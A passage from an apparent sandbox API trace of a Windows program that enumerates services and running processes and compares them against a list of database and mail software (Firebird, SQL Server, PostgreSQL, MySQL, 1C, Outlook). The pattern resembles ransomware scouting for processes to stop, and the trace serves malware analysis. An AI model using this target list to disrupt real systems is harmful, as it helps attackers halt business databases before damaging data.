	[0055.624] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0055.624] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0055.624] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0055.624] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0055.624] lstrlenW (lpString="iphlpsvc") returned 8
	[0055.624] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0055.624] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0055.624] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0055.624] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0055.624] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0055.625] lstrlenW (lpString="LanmanServer") returned 12
	[0055.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0055.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0055.625] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0055.625] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0055.625] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0055.625] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0055.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0055.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0055.625] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0055.625] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0055.625] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0055.625] lstrlenW (lpString="lmhosts") returned 7
	[0055.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0055.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0055.625] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0055.625] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0055.625] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0055.625] lstrlenW (lpString="MMCSS") returned 5
	[0055.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0055.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0055.625] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0055.625] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0055.625] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0055.625] lstrlenW (lpString="MpsSvc") returned 6
	[0055.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0055.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0055.625] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0055.625] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0055.625] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0055.625] lstrlenW (lpString="Netman") returned 6
	[0055.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0055.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0055.626] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0055.626] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0055.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0055.626] lstrlenW (lpString="netprofm") returned 8
	[0055.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0055.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0055.626] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0055.626] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0055.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0055.626] lstrlenW (lpString="NlaSvc") returned 6
	[0055.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0055.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0055.626] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0055.626] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0055.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0055.626] lstrlenW (lpString="nsi") returned 3
	[0055.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0055.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0055.626] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0055.626] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0055.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0055.626] lstrlenW (lpString="PcaSvc") returned 6
	[0055.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0055.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0055.626] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0055.626] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0055.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0055.626] lstrlenW (lpString="PlugPlay") returned 8
	[0055.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0055.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0055.626] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0055.626] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0055.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0055.626] lstrlenW (lpString="Power") returned 5
	[0055.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0055.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0055.627] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0055.627] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0055.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0055.627] lstrlenW (lpString="ProfSvc") returned 7
	[0055.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0055.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0055.627] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0055.627] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0055.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0055.627] lstrlenW (lpString="RpcEptMapper") returned 12
	[0055.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0055.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0055.627] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0055.627] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0055.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0055.627] lstrlenW (lpString="RpcSs") returned 5
	[0055.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0055.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0055.627] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0055.627] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0055.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0055.627] lstrlenW (lpString="SamSs") returned 5
	[0055.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0055.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0055.627] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0055.627] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0055.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0055.627] lstrlenW (lpString="Schedule") returned 8
	[0055.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0055.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0055.627] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0055.627] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0055.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0055.627] lstrlenW (lpString="SENS") returned 4
	[0055.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0055.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0055.628] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0055.628] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0055.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0055.628] lstrlenW (lpString="ShellHWDetection") returned 16
	[0055.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0055.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0055.628] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0055.628] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0055.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0055.628] lstrlenW (lpString="Spooler") returned 7
	[0055.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0055.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0055.628] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0055.628] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0055.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0055.628] lstrlenW (lpString="swprv") returned 5
	[0055.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1
	[0055.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1
	[0055.628] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1
	[0055.628] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1
	[0055.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1
	[0055.628] lstrlenW (lpString="SysMain") returned 7
	[0055.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0055.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0055.628] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0055.628] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0055.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0055.628] lstrlenW (lpString="Themes") returned 6
	[0055.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0055.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0055.628] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0055.628] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0055.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0055.629] lstrlenW (lpString="TrkWks") returned 6
	[0055.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0055.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0055.629] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0055.629] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0055.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0055.629] lstrlenW (lpString="UxSms") returned 5
	[0055.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0055.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0055.629] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0055.629] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0055.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0055.629] lstrlenW (lpString="VSS") returned 3
	[0055.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0055.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0055.629] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0055.629] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0055.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0055.629] lstrlenW (lpString="WdiServiceHost") returned 14
	[0055.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0055.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0055.629] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0055.629] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0055.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0055.629] lstrlenW (lpString="WdiSystemHost") returned 13
	[0055.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0055.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0055.629] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0055.629] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0055.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0055.629] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0055.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0055.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0055.630] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0055.630] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0055.630] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0055.630] lstrlenW (lpString="Winmgmt") returned 7
	[0055.630] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0055.630] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0055.630] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0055.630] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0055.630] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0055.630] lstrlenW (lpString="WPDBusEnum") returned 10
	[0055.630] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0055.630] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0055.630] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0055.630] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0055.630] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0055.630] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xbb20050 | out: hHeap=0x7d60000) returned 1
	[0055.630] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x210
	[0055.634] Process32FirstW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0055.634] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0055.634] lstrlenW (lpString="System") returned 6
	[0055.634] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0055.634] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0055.634] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0055.634] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0055.635] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0055.635] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0055.635] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0055.635] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0055.635] lstrlenW (lpString="smss.exe") returned 8
	[0055.635] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0055.635] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0055.635] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0055.635] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0055.635] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0055.635] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0055.635] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0055.635] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0055.636] lstrlenW (lpString="csrss.exe") returned 9
	[0055.636] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0055.636] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0055.636] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0055.636] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0055.636] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0055.636] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0055.636] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0055.636] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0055.637] lstrlenW (lpString="wininit.exe") returned 11
	[0055.637] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0055.637] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0055.637] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0055.637] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0055.637] lstrlenW (lpString="csrss.exe") returned 9
	[0055.637] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0055.638] lstrlenW (lpString="winlogon.exe") returned 12
	[0055.638] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0055.638] lstrlenW (lpString="services.exe") returned 12
	[0055.638] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0055.639] lstrlenW (lpString="lsass.exe") returned 9
	[0055.639] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0055.639] lstrlenW (lpString="lsm.exe") returned 7
	[0055.639] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0055.640] lstrlenW (lpString="svchost.exe") returned 11
	[0055.640] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0055.640] lstrlenW (lpString="svchost.exe") returned 11
	[0055.640] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0055.641] lstrlenW (lpString="svchost.exe") returned 11
	[0055.641] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0055.641] lstrlenW (lpString="svchost.exe") returned 11
	[0055.641] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0055.642] lstrlenW (lpString="svchost.exe") returned 11
	[0055.642] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0055.642] lstrlenW (lpString="audiodg.exe") returned 11
	[0055.642] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0055.643] lstrlenW (lpString="svchost.exe") returned 11
	[0055.643] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0055.643] lstrlenW (lpString="svchost.exe") returned 11
	[0055.643] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0055.644] lstrlenW (lpString="dwm.exe") returned 7
	[0055.644] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0055.644] lstrlenW (lpString="explorer.exe") returned 12
	[0055.644] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0055.645] lstrlenW (lpString="spoolsv.exe") returned 11
	[0055.645] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0055.645] lstrlenW (lpString="taskhost.exe") returned 12
	[0055.645] Process32NextW (in: hSnapshot=0x210, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0055.645] lstrlenW (lpString="svchost.exe") returned 11
